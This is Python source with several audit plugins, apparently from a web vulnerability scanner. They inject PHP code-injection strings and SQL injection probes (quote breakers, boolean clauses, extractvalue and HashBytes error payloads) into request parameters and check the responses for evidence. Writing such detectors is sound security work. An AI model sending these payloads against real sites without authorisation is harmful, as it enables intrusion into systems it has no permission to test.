def audit(self):
if WEB_PLATFORM.PHP not in self.response.programing and conf.level < 2:
return
regx = 'Parse error: syntax error,.*?\sin\s'
randint = random.randint(5120, 10240)
verify_result = md5(str(randint).encode())
_payloads = [
"print(md5({}));",
";print(md5({}));",
"';print(md5({}));$a='",
"\";print(md5({}));$a=\"",
"${{@print(md5({}))}}",
"${{@print(md5({}))}}\\",
"'.print(md5({})).'"
]
# 载入处理位置以及原始payload
iterdatas = self.generateItemdatas()
errors = None
errors_raw = ()
# 根据原始payload和位置组合新的payload
for origin_dict, positon in iterdatas:
payloads = self.paramsCombination(origin_dict, positon, _payloads)
for key, value, new_value, payload in payloads:
r = self.req(positon, payload)
if not r:
continue
html1 = r.text
if verify_result in html1:
result = self.new_result()
result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION)
result.add_detail("payload探测", r.reqinfo, generateResponse(r),
"探测payload:{}并发现回显:{}".format(new_value, verify_result), key, value, positon)
self.success(result)
break
if re.search(regx, html1, re.I | re.S | re.M):
result = self.new_result()
result.init_info(self.requests.url, self.desc, VulType.CMD_INNJECTION)
result.add_detail("payload探测", r.reqinfo, generateResponse(r),
"探测payload:{}并发现正则回显:{},可能是payload未闭合语句造成的错误".format(new_value, regx), key,
value, positon)
self.success(result)
break
if not errors:
errors = sensitive_page_error_message_check(html1)
if errors:
errors_raw = (key, value)
if errors:
result = self.new_result()
key, value = errors_raw
result.init_info(self.requests.url, "敏感配置信息泄漏", VulType.SENSITIVE)
for m in errors:
text = m["text"]
_type = m["type"]
result.add_detail("payload请求", r.reqinfo, generateResponse(r),
"匹配组件:{} 匹配正则:{}".format(_type, text), key, value, positon)
self.success(result)
def audit(self):
num = random_num(4)
s = random_str(4)
_payloads = [
'鎈\'"\(', "'", "')", "';", '"', '")', '";', ' order By 500 ', "--",
"-0", ") AND {}={} AND ({}={}".format(num, num + 1, num, num),
" AND {}={}%23".format(num, num + 1),
" %' AND {}={} AND '%'='".format(num, num + 1),
" ') AND {}={} AND ('{}'='{}".format(num, num + 1, s, s),
" ' AND {}={} AND '{}'='{}".format(num, num + 1, s, s), '`', '`)',
'`;', '\\', "%27", "%%2727", "%25%27", "%60", "%5C",
"extractvalue(1,concat(char(126),md5({})))".format(random_num),
"convert(int,sys.fn_sqlvarbasetostr(HashBytes('MD5','{}')))".
format(random_num)
]
# 载入处理位置以及原始payload
iterdatas = self.generateItemdatas()
# 根据原始payload和位置组合新的payload
for origin_dict, positon in iterdatas:
payloads = self.paramsCombination(origin_dict, positon, _payloads)
for key, value, new_value, payload in payloads:
r = self.req(positon, payload)
if not r:
continue
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
result = self.new_result()
result.init_info(self.requests.url, "SQL注入",
VulType.SQLI)
result.add_detail(
"payload探测", r.reqinfo, generateResponse(r),
"DBMS_TYPE:{} 匹配结果:{}".format(
dbms_type,
match.group()), key, payload, positon)
self.success(result)
return True
message_lists = sensitive_page_error_message_check(html)
if message_lists:
result = self.new_result()
result.init_info(self.requests.url, "SQL注入", VulType.SQLI)
result.add_detail(
"payload探测", r.reqinfo, generateResponse(r),
"需要注意的报错信息:{}".format(repr(message_lists)), key,
payload, positon)
self.success(result)
return True
def audit(self):
headers = self.requests.headers
p = urlparse(self.requests.url)
domain = "{}://{}/".format(p.scheme, p.netloc) + random_str(6) + ".jsp"
r = requests.get(domain, headers=headers)
messages = sensitive_page_error_message_check(r.text)
if messages:
result = self.new_result()
result.init_info(self.requests.url, "敏感的报错信息", VulType.SENSITIVE)
for m in messages:
text = m["text"]
_type = m["type"]
result.add_detail("payload请求", r.reqinfo, generateResponse(r),
"匹配组件:{} 匹配正则:{}".format(_type, text), "",
"", PLACE.GET)
self.success(result)
def audit(self):
_payloads = ['鎈\'"\(']
# 载入处理位置以及原始payload
iterdatas = self.generateItemdatas()
# 根据原始payload和位置组合新的payload
for origin_dict, positon in iterdatas:
payloads = self.paramsCombination(origin_dict, positon, _payloads)
for key, value, new_value, payload in payloads:
r = self.req(positon, payload)
if not r:
continue
html = r.text
for sql_regex, dbms_type in Get_sql_errors():
match = sql_regex.search(html)
if match:
result = self.new_result()
result.init_info(self.requests.url, "SQL注入",
VulType.SQLI)
result.add_detail(
"payload探测", r.reqinfo, generateResponse(r),
"DBMS_TYPE:{} 匹配结果:{}".format(
dbms_type,
match.group()), key, payload, positon)
self.success(result)
return True
message_lists = sensitive_page_error_message_check(html)
if message_lists:
result = self.new_result()
result.init_info(self.requests.url, "基于报错的SQL注入",
VulType.SQLI)
result.add_detail(
"payload探测", r.reqinfo, generateResponse(r),
"需要注意的报错信息:{}".format(repr(message_lists)), key,
payload, positon)
self.success(result)
return True
